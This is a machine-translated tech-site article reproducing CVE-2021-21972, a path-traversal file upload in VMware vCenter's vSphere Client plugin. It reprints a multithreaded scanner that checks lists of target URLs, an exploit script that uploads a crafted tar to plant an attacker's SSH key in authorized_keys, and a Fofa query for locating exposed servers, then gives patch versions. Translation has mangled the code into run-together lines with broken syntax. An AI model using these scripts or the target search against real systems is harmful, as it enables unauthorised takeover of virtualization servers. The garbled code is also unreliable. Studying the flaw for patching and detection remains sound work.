Shulou(Shulou.com)05/31 Report--

How to vSphere Client RCE CVE-2021-21972 reproduction, many novices are not very clear, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Brief introduction of vulnerabilities

VSphere is a virtualization platform suite launched by VMware, which includes a series of software such as ESXi, vCenter Server and so on. VCenter Server is the control center of ESXi, which can manage all vSphere hosts and virtual machines in the data center from a single control point.

VSphere Client (HTML5) contains a remote code execution vulnerability in the vCenter Server plug-in. Unauthorized attackers can send specially crafted requests to vCenter Server through a server with port 443 open, write to webshell, and control the server.

Scope of influence

VMware vCenter Server: 7.0/6.7/6.5

Loophole analysis

The vrops plug-in in vCenter Server has some sensitive interfaces with unidentified permissions, among which the uploadova interface has the function of file upload.

@ RequestMapping (value = {"/ uploadova"}, method = {RequestMethod.POST}) public void uploadOvaFile (@ RequestParam (value = "uploadFile", required = true) CommonsMultipartFile uploadFile, HttpServletResponse response) throws Exception {logger.info ("Entering uploadOvaFile api"); int code = uploadFile.isEmpty ()? 400: 200; PrintWriter wr = null;... Response.setStatus (code); String returnStatus = "SUCCESS"; if (! uploadFile.isEmpty ()) {try {logger.info ("Downloading OVA file has been started"); logger.info ("Size of the file received:" + uploadFile.getSize ()); InputStream inputStream = uploadFile.getInputStream () File dir = new File ("/ tmp/unicorn_ova_dir"); if (! dir.exists ()) {dir.mkdirs ();} else {String [] entries = dir.list (); String [] var9 = entries; int var10 = entries.length For (int var11 = 0; var11 < var10; + + var11) {String entry = var9 [var11]; File currentFile = new File (dir.getPath (), entry); currentFile.delete ();} logger.info ("Successfully cleaned: / tmp/unicorn_ova_dir") } TarArchiveInputStream in = new TarArchiveInputStream (inputStream); TarArchiveEntry entry = in.getNextTarEntry (); ArrayList result = new ArrayList ()

In the code, unzip the tar file and upload it to the / tmp/unicorn_ova_dir directory

While (entry! = null) {if (entry.isDirectory ()) {entry = in.getNextTarEntry ();} else {File curfile = new File ("/ tmp/unicorn_ova_dir", entry.getName ()); File parent = curfile.getParentFile () If (! parent.exists ()) {parent.mkdirs ()

The above code directly splices the tar extracted file name with / tmp/unicorn_ova_dir and writes it to the file, here you can use.. / bypass the directory limit.

If the target is the Linux environment, you can create a tar file named.. /.. / home/vsphere-ui/.ssh/authorized_keys. After uploading, you can use SSH to connect to the server.

POC & EXP

POC is from github:

Https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/blob/main/CVE-2021-21972.py

#-*-coding:utf-8-*-banner = "" 888888ba dP 88 `8b 88 a88aaaaaa8P' .d8888b. D8888P .d8888b. DP dP 88 `8b. 88'88 Y8ooooo. 88 88 88. 88 88. . 88 88 88. .88 88888888P `88888P8 dP `88888P' `88888P' ooooooooooooooooooooooooooooooooooooooooooooooooooooo @ time:2021/02/24 CVE-2021-21972.py C0de by NebulabdSec-@ batsu "" print (banner) import threadpoolimport randomimport requestsimport argparseimport http.clientimport urllib3urllib3.disable_warnings (urllib3.exceptions.InsecureRequestWarning) http.client.HTTPConnection._http_vsn = 10http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'TARGET_URI = "/ ui / vropspluginui/rest/services/uploadova "def get_ua (): first_num = random.randint (55 62) third_num = random.randint (0, 3200) fourth_num = random.randint (0140) os_type = ['(Windows NT 3200) WOW64)','(Windows NT 10.0; WOW64)','(X11; Linux x86 / 64)','(Macintosh Intel Mac OS X 10 / 12 / 6)] chrome_version = 'Chrome/ {} .0. {}. Format (first_num, third_num, fourth_num) ua =' .join (['Mozilla/5.0', random.choice (os_type),' AppleWebKit/537.36','(KHTML, like Gecko)', chrome_version 'Safari/537.36']) return uadef CVE_2021_21972 (url): proxies = {"scoks5": "http://127.0.0.1:1081"} headers = {' User-Agent': get_ua ()," Content-Type ":" application/x-www-form-urlencoded "} targetUrl = url + TARGET_URI try: res = requests.get (targetUrl) Headers=headers, timeout=15, verify=False Proxies=proxies) # proxies= {'socks5':' http://127.0.0.1:1081'}) # print (len (res.text)) if res.status_code = = 405: print ("[+] URL: {}-there is a CVE-2021-21972 vulnerability" .format (url ) # print ("[+] Command success result:" + res.text + "\ n") with open ("address for vulnerabilities .txt" 'a') as fw: fw.write (url +'\ n') else: print ("[-]" + url + "No CVE-2021-21972 leak found.\ n") # except Exception as e: # print (e) except: print ("[-]" + url + "Request ERROR.\ n") def multithreading (filename) Pools=5): works = [] with open (filename, "r") as f: for i in f: func_params = [i.rstrip ("\ n")] # func_params = [I] + [cmd] works.append ((func_params, None)) pool = threadpool.ThreadPool (pools) reqs = threadpool.makeRequests (CVE_2021_21972) Works) [pool.putRequest (req) for req in reqs] pool.wait () def main (): parser = argparse.ArgumentParser () parser.add_argument ("- u", "- url", help= "Target URL" Example: http://ip:port") parser.add_argument ("- f", "--file", help= "Url File; Example:url.txt") # parser.add_argument ("- c", "--cmd", help= "Commands to be executed ") args = parser.parse_args () url = args.url # cmd = args.cmd file_path = args.file if url! = None and file_path = = None: CVE_2021_21972 (url) elif url = = None and file_path! = None: multithreading (file_path, 10) # default 15 thread if _ _ name__ = =" _ main__ ": main ()

EXP is from CSDN:

Https://blog.csdn.net/weixin_43650289/article/details/114055417

Import tarfileimport osfrom io import BytesIOimport requestsproxies = {"http": "http://127.0.0.1:8080"," https ":" http://127.0.0.1:8080",}def return_zip (): with tarfile.open ("test.tar") 'w') as tar: payload = BytesIO () id_rsa_pub = 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwgGuwNdSGHKvzHsHt7QImwwJ08Wa/+gHXOt+VwZTD23rLwCGVeYmfKObDY0uFfe2O4jr+sPamgA8As4LwdqtkadBPR+EzZB+PlS66RcVnUnDU4UdMhQjhyj/uv3pdtugugJpB9xaLdrUWwGoOLYA/djxD5hmojGdoYydBezsNhj2xXRyaoq3AZVqh2YLlhpwKnzhodk12a7/7EU+6Zj/ee5jktEwkBsVsDLTTWPpSnzK7r+kAHkbYx8fvO3Fk+9jlwadgbmhHJrpPr8gLEhwvrEnPcK1/j+QXvVkgy2cuYxl9GCUPv2wgZCN50f3wQlaJiektm2S9WkN5dLDdX+X4w==' tarinfo = tarfile.TarInfo (name='../home/vsphere-ui/.ssh/authorized_keys') F1 = BytesIO (id_rsa_pub.encode ()) tarinfo.size = len (f1.read ()) F1. Seek (0) tar.addfile (tarinfo Fileobj=f1) tar.close () payload.seek (0) def getshell (url): files= {'uploadFile':open (' test.tar','rb')} try: r = requests.post (url=url, files=files,proxies=proxies) Verify = False) .text print (r) except: print ('flase') if _ _ name__ = = "_ _ main__": try: return_zip () url= "https://192.168.1.1/ui/vropspluginui/rest/services/uploadova" getshell (url) except IOError ase: raise e vulnerability recurrence

Fofa searches for title= "+ ID_VC_Welcome +"

Use POC to verify the existence of vulnerabilities:

Use EXP to upload tar files:

Upload authorized_keys successfully

Repair suggestion

Upgrade vCenter Server7.0 version to 7.0.U1c

Upgrade vCenter Server6.7 version to 6.7.U3l

Upgrade vCenter Server6.5 version to 6.5U3n

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.